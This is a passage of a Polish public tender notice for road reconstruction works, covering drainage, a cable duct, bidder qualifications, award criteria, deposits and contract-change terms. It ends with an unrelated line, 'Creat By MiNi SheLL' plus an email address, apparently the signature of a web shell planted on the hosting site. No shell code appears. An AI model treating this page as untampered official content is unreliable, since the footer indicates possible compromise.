zamawiającym.<br/>Sposób odwodnienia drogi gminnej nie zmienia się. Wody zostaną odprowadzane do istniejących wpustów ulicznych a także na przyległe tereny zielone.<br/>W km 0+225 zaprojektowano układ chłonny złożony z komór drenażowych.<br/>W ramach planowanej inwestycji przewiduje się budowę:<br/>• 3 wpusty deszczowe,<br/>• 4 komory drenażowych,<br/>• 1 studnie rewizyjne betonowe,<br/>• 1 studnie chłonną,<br/>W km 0+440 zaprojektowano wymianę wpustu ulicznego oraz studni chłonnej z kręgów betonowych fi 1000.<br/>W zakresie robót znajduje się również wykonanie kanału technologicznego na długości 690 m wraz z studniami SK-1 w ilości 21 sztuk.<br/>Projektuje się kanał technologiczny wykonany przy wykorzystaniu:<br/>- rura osłonowa 1 x ∅110mm/6,3mm (rura osłonowa pusta, w ziemi),<br/>Rurociąg należy układać zgodnie z trasą wyznaczoną na rys. nr 2. Rurociąg powinien być ułożony na głębokości 0,8 m. Na końcach odcinka projektuje się studnie kablowe. Na<br/>skrzyżowaniach rurociągów z drogami, rowami i urządzeniami uzbrojenia terenu projektuje się rury ochronne RHDPE fi160mm/9,1mm (rura osłonowa pierwotna, w ziemi).<br/>Dodatkowo Wykonawca zobowiązuje się do wykonania i montażu 2 szt. tablic informacyjnych zgodnie z wymaganiami określonymi w załącznika nr 6 do Uchwała nr 102 Rady Ministrów z dnia 23 lipca 2020 r. w sprawie wsparcia na realizację zadań inwestycyjnych przez jednostki samorządu terytorialnego. Zamawiający poda niezbędne informacje jakie muszą znaleźć się na tablicy. Wykonawca jest zobowiązany do uzyskania akceptacji Zamawiającego do projektu tablicy przed jej wykonaniem. Tablicę informacyjną należy umieścić w momencie rozpoczęcia inwestycji, w pobliżu miejsca wykonywania robót, w miejscu ogólnodostępnym i dobrze widocznym.<br/>Szczegółowy opis przedmiotu zamówienia zawiera projekt budowlany oraz specyfikacja techniczna wykonania i odbioru robót budowlanych stanowiące załączniki do niniejszej specyfikacji warunków zamówienia (dalej SWZ). Opis przedmiotu zamówienia został wskazany w załączniku nr 1 b </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca uczestniczący w postępowaniu musi spełnić niżej wymienione warunki udziału w postępowaniu.<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie określa;<br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający nie określa;<br/>4) zdolności technicznej lub zawodowej:<br/>a) wykaz robót - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w terminie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli co najmniej:<br/>Część 1: 3 roboty budowlane podobnych do objętej przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli wykonawca wykaże się wykonaniem co najmniej 3 robót budowlanych polegających na budowie, przebudowie lub remoncie drogi o wartości co najmniej:<br/>dla części 1: 2 000 000,00 PLN brutto każda z robót.<br/>Część 2: 1 robota budowlana podobna do objętej przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli wykonawca wykaże się wykonaniem co najmniej 1 roboty budowlanej polegającej na budowie, przebudowie lub remoncie drogi o wartości co najmniej:<br/>dla części 2: 1 000 000,00 PLN brutto<br/>wzór oświadczenia stanowi - załącznik nr 5 do SWZ;<br/>b) Warunek dysponowania osobami – minimalny zakres kwalifikacji i doświadczenia wymagany od osób skierowanych do realizacji zamówienia.<br/>Wykonawca musi wykazać osoby, które zostaną skierowane do realizacji zamówienia posiadające kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia oraz Wykonawca musi wykazać że będzie dysponował osobami podając podstawę do dysponowania tymi osobami. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonywania zamówienia:<br/>- Kierownik budowy w specjalności drogowej w zakresie budowy dróg1- minimum 1 osoba na stanowisku kierownika budowy, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej w zakresie budowy dróg lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. 2019 r. poz.1186 z późn. zm), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa - wzór oświadczenia stanowi - załącznik nr 6 do SWZ;<br/>2.2. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>2.4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z wnioskiem o dopuszczenie do udziału w postępowaniu albo odpowiednio wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów (przykładowe oświadczenie – załącznik nr 7 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca, realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów).<br/>1 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu - przykładowe oświadczenie – załącznik nr 8 do<br/>SWZ – wymagania dotyczące podpisania dokumentu elektronicznego wg rozdz. IX pkt 1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót - Wykonawca spełni warunek, jeżeli wykaże, że wykonał w terminie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli co najmniej 1 robotę budowlaną podobnej do objętej przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli wykonawca wykaże się wykonaniem co najmniej:<br/>Część 1: 3 roboty budowlane podobnych do objętej przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli wykonawca wykaże się wykonaniem co najmniej 3 robót budowlanych polegających na budowie, przebudowie lub remoncie drogi o wartości co najmniej:<br/>dla części 1: 2 000 000,00 PLN brutto każda z robót.<br/>Część 2: 1 robota budowlana podobna do objętej przedmiotem zamówienia. Warunek zostanie spełniony, jeżeli wykonawca wykaże się wykonaniem co najmniej 1 roboty budowlanej polegającej na budowie, przebudowie lub remoncie drogi o wartości co najmniej:<br/>dla części 2: 1 000 000,00 PLN brutto<br/>wzór oświadczenia stanowi - załącznik nr 5 do SWZ;<br/>b) Warunek dysponowania osobami – minimalny zakres kwalifikacji i doświadczenia wymagany od osób skierowanych do realizacji zamówienia.<br/>Wykonawca musi wykazać osoby, które zostaną skierowane do realizacji zamówienia posiadające kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia oraz Wykonawca musi wykazać że będzie dysponował osobami podając podstawę do dysponowania tymi osobami. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonywania zamówienia:<br/>- Kierownik budowy w specjalności drogowej w zakresie budowy dróg1- minimum 1 osoba na stanowisku kierownika budowy, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej w zakresie budowy dróg lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2019r. poz.117) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. 2019 r. poz.1186 z późn. zm), tj. osobą, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą wymogi, o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa - wzór oświadczenia stanowi - załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) wypełniony formularz ofertowy (załącznik nr 2 do SWZ) – wymagania dotyczące podpisania<br/>dokumentu elektronicznego wg pkt 1.2) dokument określający zasady reprezentacji oraz osoby<br/>uprawnione do reprezentacji wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do<br/>reprezentacji wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika<br/>bezpośrednio z odpisu z właściwego rejestru, albo z centralnej ewidencji informacji o działalności<br/>gospodarczej (przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych<br/>ogólnodostępnych baz danych. 2.1. W celu potwierdzenia, że osoba działająca w imieniu<br/>wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu<br/>lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa powyżej, jeżeli zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał w ofercie dane<br/>umożliwiające dostęp do tych dokumentów. Jeżeli w imieniu wykonawcy działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa powyżej,<br/>zamawiający może żądać od wykonawcy pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania wykonawcy. Powyższe wymagania stosuje<br/>się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego.2.2. W przypadku oferty wspólnej należy do oferty załączyć<br/>dokument ustanawiający pełnomocnika do reprezentowania wykonawców wspólnie<br/>ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie niniejszego zamówienia publicznego – wymagania dotyczące<br/>podpisania dokumentu elektronicznego wg pkt 1.3. Dokumenty i oświadczenia wymagane w<br/>rozdziale VI SWZ, które wykonawca jest zobowiązany złożyć w ofercie:1) Na braku podstaw<br/>wykluczenia z postępowania Wykonawca składa wstępne oświadczenie dotyczące braku<br/>podstaw wykluczenia z postępowania, na podstawie art. 125 ust. 1 ustawy Pzp, zgodnie z<br/>treścią załącznika nr 4 do SWZ – wymagania dotyczące podpisania dokumentu elektronicznego<br/>wg pkt 1.2) Na wykazanie spełniania warunków udziału w postępowaniu Wykonawca składa<br/>wstępne oświadczenie dotyczące spełnienia warunków udziału w postępowaniu, na podstawie<br/>art. 125 ust. 1 ustawy Pzp, zgodnie z treścią załącznika nr 3 do SWZ – wymagania dotyczące<br/>podpisania dokumentu elektronicznego wg pkt 1.3) W przypadku konsorcjum - oferta wspólna -<br/>w zakresie braku podstaw do wykluczenia oświadczenia (załącznik nr 4 do SWZ) składają<br/>wszyscy wykonawcy, w zakresie spełnienia warunków udziału ten wykonawca który spełnia<br/>dany warunek – wymagania dotyczące podpisania dokumentu elektronicznego wg pkt 1. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Załącznik nr 4 – oświadczenie składane na podstawie art. 125 ust. 1 ustawy Pzp dotyczące<br/>spełnienia warunków udziału w postępowaniu Załącznik nr 3 – oświadczenie składane na<br/>podstawie art. 125 ust. 1 ustawy Pzp dotyczące przesłanek wykluczenia z postępowania<br/>Załącznik nr 8 – oświadczenie wykonawcy w zakresie wypełnienia obowiązków informacyjnych<br/>przewidzianych w art. 13 lub art. 14 RODO Dokument określający zasady reprezentacji oraz<br/>osoby uprawnione do reprezentacji wykonawcy/pełnomocnictwo.Pełnomocnictwo(a) -<br/>umocowanie do reprezentacji wykonawcy w przypadku, gdy upoważnienie do podpisania oferty<br/>nie wynika bezpośrednio z odpisu z właściwego rejestru, albo z centralnej ewidencji informacji o<br/>działalności gospodarczej (przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach<br/>internetowych ogólnodostępnych baz danych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>Część 1: 60 000,00 zł (słownie: sześćdziesiąt tysięcy i 00/100 złotych)<br/>Część 2: 12 000,00 zł (słownie: dwanaście tysięcy i 00/100 złotych) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji<br/>wykonawcy/pełnomocnictwo. Pełnomocnictwo(a) - umocowanie do reprezentacji wykonawcy w<br/>przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z odpisu z<br/>właściwego rejestru, albo z centralnej ewidencji informacji o działalności gospodarczej<br/>(przykładowo: KRS, CEIDG) ogólnie dostępnego na stronach internetowych ogólnodostępnych<br/>baz danych. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, określone zostały w załączniku nr 10 do SWZ.2.<br/>Zamawiający przewiduje możliwość dokonania zamian w umowie na zasadach określonych w<br/>projekcie umowy. 1. Zmiana umowy jest możliwa w sytuacji wystąpienia przesłanek określonych<br/>w art. 455 i następnych ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.<br/>z 2019 r. poz. 2019 ze zm.).2. Zamawiający przewiduje również możliwość dokonywania zmian<br/>postanowień zawartej umowy, także w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, w następujących okolicznościach: 1) zmiana terminów wykonania umowy:<br/>1.1) zmiany wynikające z warunków atmosferycznych, które spowodowały niezawinione i<br/>niemożliwe do uniknięcia przez Wykonawcę opóźnienie; z powodu technologii realizacji prac,<br/>normach lub innych przepisach wymagającej konkretnych warunków atmosferycznych (jeżeli<br/>konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które<br/>Wykonawca ponosi odpowiedzialność), w szczególności:a) klęsk żywiołowych,b) warunków<br/>atmosferycznych odbiegających od typowych dla danej pory roku, uniemożliwiających<br/>prowadzenie robót budowlanych/prac geologicznych, przeprowadzenie prób i sprawdzeń,<br/>dokonywanie odbiorów;1.2) zmiany spowodowane nieprzewidzianymi w SWZ warunkami<br/>geologicznymi, archeologicznymi lub terenowymi, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w szczególności:a) wystąpienie w trakcie<br/>prowadzenia robót klęsk żywiołowych,b) konieczność wykonania wykopalisk<br/>archeologicznych,c) wystąpienie odmiennych od przyjętych w dokumentacji projektowej<br/>warunków geologicznych,d) wystąpienie odmiennych od przyjętych w dokumentacji projektowej<br/>warunków terenowych, w szczególności istnienie niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych obiektów budowlanych lub podziemnych urządzeń, instalacji lub obiektów<br/>infrastrukturalnych;e) objęcie zasobów, tworów i składników przyrody jedną z form<br/>przewidzianych w ustawie z dnia 16 kwietnia 2004 r. o ochronie przyrody (tekst jednolity Dz. U. z<br/>2020 r., poz. 55 ze zm.), zmiana ich granic lub przedmiotu ochrony;f) odkrycie zabytku albo<br/>stanowiska archeologicznego lub wprowadzenie istotnej dla przedsięwzięcia zmiany formy jego<br/>ochrony;1.3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,<br/>które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w<br/>szczególności: a) wstrzymanie robót przez Zamawiającego, b) konieczność usunięcia błędów<br/>lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i<br/>odbioru robót;1.4) zmiany będące następstwem działania lub braku działania organów<br/>administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji w<br/>szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, które<br/>spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę opóźnienie, w<br/>szczególności:a) przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich regulacji<br/>nie ma – typowych w danych okolicznościach, terminów wydawania przez organy administracji<br/>lub inne podmioty decyzji, zezwoleń, uzgodnień itp.,b) odmowa wydania przez organy<br/>administracji lub inne podmioty decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez<br/>Wykonawcę, w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji<br/>inwestycji;c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ<br/>na realizację przedmiotu zamówienia lub świadczenia Stron;(ciąg dalszy w SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com